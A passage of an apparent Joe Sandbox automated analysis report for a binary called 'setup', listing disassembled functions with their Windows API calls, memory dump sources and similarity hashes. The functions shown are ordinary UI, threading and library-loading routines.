                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00D819CA,00D81996,?,?,00BDC5ED,00CCA740,?,00000008), ref: 00D81A5A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                              • Opcode ID: f4444b53e7eab662ce88fde477442e1679b4cfaa5ec16a485f543b016c1e14c7
                                                                                                                                                                              • Instruction ID: 061865624cb0816fb5bfd02edc062a88bb41d2355ffe257a78036e50e524be0a
                                                                                                                                                                              • Opcode Fuzzy Hash: f4444b53e7eab662ce88fde477442e1679b4cfaa5ec16a485f543b016c1e14c7
                                                                                                                                                                              • Instruction Fuzzy Hash: 4401753620A2129E972837BAAC85B6B269CDB11779774032BF524751E0EF158C5B5370
                                                                                                                                                                              Function 00BD7A00 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 182windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(?,SysTabControl32,?,46010000,?,?,?,?,00000000,00000309,00000000), ref: 00BD7AFD
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00BD7B12
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00BD7B1A
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                                • Part of subcall function 00BD9710: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BD975F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$AllocateCreateHeapWindow
                                                                                                                                                                              • String ID: SysTabControl32$TabHost
                                                                                                                                                                              • API String ID: 2359350451-2872506973
                                                                                                                                                                              • Opcode ID: d196a5c60479c988909924eb7092b69d8ecc6a2fcf0e3aeffc13c9585963360b
                                                                                                                                                                              • Instruction ID: 1c5fc6f26e7a511b6061dfc7697dbfc295fb8009e93b76b5d81ad63b18d1edfe
                                                                                                                                                                              • Opcode Fuzzy Hash: d196a5c60479c988909924eb7092b69d8ecc6a2fcf0e3aeffc13c9585963360b
                                                                                                                                                                              • Instruction Fuzzy Hash: 76519D31A00605AFDB14DF69C844BAEFBF5FF49710F10426AE815A73A1EB71AD04CBA5
                                                                                                                                                                              Function 00BAF828 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 166libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,.dll,?,00000000,?,?,?,?,?,?,?), ref: 00BAF96B
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00BAF9B4
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,DllGetActivationFactory,00000002,00000000,?,.dll,?,00000000,?,?,?,?,?,?,?), ref: 00BAFA02
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: .dll$DllGetActivationFactory
                                                                                                                                                                              • API String ID: 145871493-1250754257
                                                                                                                                                                              • Opcode ID: 49ec75e46b0d7616353488949f3328f34e21dc9528cefee7414e49595c64f33c
                                                                                                                                                                              • Instruction ID: b902582a813f815405e5a649fd56e56b2c22eb6699b27c664b39acebf2be6c37
                                                                                                                                                                              • Opcode Fuzzy Hash: 49ec75e46b0d7616353488949f3328f34e21dc9528cefee7414e49595c64f33c
                                                                                                                                                                              • Instruction Fuzzy Hash: EE615D30D0820AEEDF14DFA8C895BFDB7F1EF15300F2481A9E415A7291EB749A45CB61
                                                                                                                                                                              Function 00BC4650 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113timeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(02141699,02141699,?), ref: 00BC468F
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,02141699,?), ref: 00BC469C
                                                                                                                                                                              • KillTimer.USER32(?,00000001), ref: 00BC46E4
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,?), ref: 00BC4773
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInitializeKillLeaveTimer
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3614119372-3261393531
                                                                                                                                                                              • Opcode ID: fc72d4d099ab6550ab9edfb9b2b43ac05147d0e845b19f2e533c473a430a5b3e
                                                                                                                                                                              • Instruction ID: 7cb78d617386937db14018eedaca8f0dc8b94d6c4a17145f4cb027056ad463b6
                                                                                                                                                                              • Opcode Fuzzy Hash: fc72d4d099ab6550ab9edfb9b2b43ac05147d0e845b19f2e533c473a430a5b3e
                                                                                                                                                                              • Instruction Fuzzy Hash: DC41C2342007418FDB11DF28D954BAABBF5EF56310F2046AEE596E7391CB31AE15CB90
                                                                                                                                                                              Function 00BAF84C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,.dll,?,00000000,?,?,?,?,?,?,?), ref: 00BAF96B
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00BAF9B4
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,DllGetActivationFactory,00000002,00000000,?,.dll,?,00000000,?,?,?,?,?,?,?), ref: 00BAFA02
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: .dll$DllGetActivationFactory
                                                                                                                                                                              • API String ID: 145871493-1250754257
                                                                                                                                                                              • Opcode ID: 10ad0eb947153b09064dffe9335a08d3674c6e393394a8829c2b6621656c8fb9
                                                                                                                                                                              • Instruction ID: 05a4d00eca3899bc36a1d687f518ce20c759c06169d00350e32f45e74f318b05
                                                                                                                                                                              • Opcode Fuzzy Hash: 10ad0eb947153b09064dffe9335a08d3674c6e393394a8829c2b6621656c8fb9
                                                                                                                                                                              • Instruction Fuzzy Hash: CD414F30D0420AEEDF24DFA8C894AFEB7F1EF55300F2581A9D015A71A1EB74DA45CB61
                                                                                                                                                                              Function 00CB6AB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96registrylibraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Advapi32.dll,02141699,02141699,?,?,?,?,Function_002082C0,000000FF), ref: 00CB6AF3
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 00CB6B1C
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,Function_002082C0,000000FF), ref: 00CB6B7C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                              • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                                                                                                                              • API String ID: 4190037839-2994018265
                                                                                                                                                                              • Opcode ID: ad5e5e4a1d5982207da7c0792305d734f40d75811c291323793eb08f82a81682
                                                                                                                                                                              • Instruction ID: f090594386b7de1b0776b7878d8da3e0af42ce0e3a55a7d113e1a158c9c89312
                                                                                                                                                                              • Opcode Fuzzy Hash: ad5e5e4a1d5982207da7c0792305d734f40d75811c291323793eb08f82a81682
                                                                                                                                                                              • Instruction Fuzzy Hash: B0318E72744205AFEB248F45DC45FEABBB8FB08750F10412AF915E7280E779A904DAA4
                                                                                                                                                                              Function 00D8B56C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,02141699,00000000,?,00000000,00E0A459,000000FF,?,00D8B4FC,?,?,00D8B4D0,-00000010), ref: 00D8B5A1
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D8B5B3
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00E0A459,000000FF,?,00D8B4FC,?,?,00D8B4D0,-00000010), ref: 00D8B5D5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                              • Opcode ID: 4fb39bfe22fc54c097f482e74a368542dca1cb2403541a964f4b346b531a9ac5
                                                                                                                                                                              • Instruction ID: 7f7e3aab9160a244316860c9f306b200e0b58a17f6c9b465a7b957037d637837
                                                                                                                                                                              • Opcode Fuzzy Hash: 4fb39bfe22fc54c097f482e74a368542dca1cb2403541a964f4b346b531a9ac5
                                                                                                                                                                              • Instruction Fuzzy Hash: 6701D631940759EFDB019F91DC09BAEBBB8FB04B20F144626F811F26E0DB759948CB90
                                                                                                                                                                              Function 00CD4980 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                              • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 00CD49DE
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00CD49E5
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD49FC
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$AddressConditionInit_thread_footerLibraryLoadProcVariableWake
                                                                                                                                                                              • String ID: Dbghelp.dll$SymFromAddr
                                                                                                                                                                              • API String ID: 3268644551-642441706
                                                                                                                                                                              • Opcode ID: 7d33c1c760ee5d0f94112db22891aef79b31df4d3f3130cbe42d6996ffe4e8bb
                                                                                                                                                                              • Instruction ID: b1403682a2b8974ef214a02c5a495311700aefa8418548477145b7c8d8561d5a
                                                                                                                                                                              • Opcode Fuzzy Hash: 7d33c1c760ee5d0f94112db22891aef79b31df4d3f3130cbe42d6996ffe4e8bb
                                                                                                                                                                              • Instruction Fuzzy Hash: 0F01BCB1A49744EFD710DF99ED45B09B7F4EB0AB20F2003A6E965A73D0C73179088B22
                                                                                                                                                                              Function 00D802E8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SleepConditionVariableCS.KERNELBASE(?,00D80285,00000064), ref: 00D8030B
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,00D80285,00000064,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF), ref: 00D80315
                                                                                                                                                                              • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00D80285,00000064,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF), ref: 00D80326
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00E9FF6C,?,00D80285,00000064,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409), ref: 00D8032D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3269011525-3261393531
                                                                                                                                                                              • Opcode ID: 291315e3188975fc95853fa6af841e7d601c412be067e8b98e1a1d378f501d2c
                                                                                                                                                                              • Instruction ID: 1da403310039d3db65478d6e5977aae82dbbcf87aead0d25ca56e5722cba9e89
                                                                                                                                                                              • Opcode Fuzzy Hash: 291315e3188975fc95853fa6af841e7d601c412be067e8b98e1a1d378f501d2c
                                                                                                                                                                              • Instruction Fuzzy Hash: 70E01B31B45628AFCA113B91FC0998D3E189B067517215231F549F51708B635895CBD4
                                                                                                                                                                              Function 00BC4100 Relevance: 7.7, APIs: 5, Instructions: 237windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(00000001), ref: 00BC4172
                                                                                                                                                                              • GetParent.USER32(00000001), ref: 00BC419D
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000138,?,00000001), ref: 00BC41AD
                                                                                                                                                                              • FillRect.USER32(?,?,00000000), ref: 00BC41BB
                                                                                                                                                                              • ReleaseDC.USER32(00000001,00000000), ref: 00BC4391
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FillMessageParentRectReleaseSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2215362955-0
                                                                                                                                                                              • Opcode ID: 482a3f508fce7449c086367cf5f3f81ca739a7acd76b4bfbc01238afcaad4132
                                                                                                                                                                              • Instruction ID: 426130dae7466c98d19bd838ff6bb1a7dbb13855c346b2cf619772a7a31ee58e
                                                                                                                                                                              • Opcode Fuzzy Hash: 482a3f508fce7449c086367cf5f3f81ca739a7acd76b4bfbc01238afcaad4132
                                                                                                                                                                              • Instruction Fuzzy Hash: 2B9103B1A00609AFDB15CFA5CD45BAEBBF9FF48300F14412AE905E7660DB31AA15CB90
                                                                                                                                                                              Function 00D04C00 Relevance: 7.7, APIs: 5, Instructions: 201COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$HeapProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 275895251-0
                                                                                                                                                                              • Opcode ID: 136495513d720c87d3718470900e5f98019f69b335175a2dfcfc00b5b82353e1
                                                                                                                                                                              • Instruction ID: 0fa94451c8860951b60d1266017254620f04b09e2ee7c296ca1727adac66433b
                                                                                                                                                                              • Opcode Fuzzy Hash: 136495513d720c87d3718470900e5f98019f69b335175a2dfcfc00b5b82353e1
                                                                                                                                                                              • Instruction Fuzzy Hash: B9818070900205DFDB00CFA9C948B9EBFB5FF49314F288269E918AB395D7759944CBA0
                                                                                                                                                                              Function 00CAB2C0 Relevance: 7.7, APIs: 5, Instructions: 151windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowDC.USER32(?,02141699,?,?,00000000,?,?,?,?,?,?,?,?,00000000,00DE68DD,000000FF), ref: 00CAB2F0
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00CAB310
                                                                                                                                                                              • IsWindowEnabled.USER32(?), ref: 00CAB341
                                                                                                                                                                              • GetFocus.USER32 ref: 00CAB34F
                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 00CAB465
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$DeleteEnabledFocusRect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 733580484-0
                                                                                                                                                                              • Opcode ID: 217bcfbe5cc7d48d2783a6364435bde084212cd5ed3b5f35e26959976de2b5f4
                                                                                                                                                                              • Instruction ID: 86c127f16400e39959777adc765f794e79a7def4b9bc9b5865b9b3729fa5a37d
                                                                                                                                                                              • Opcode Fuzzy Hash: 217bcfbe5cc7d48d2783a6364435bde084212cd5ed3b5f35e26959976de2b5f4
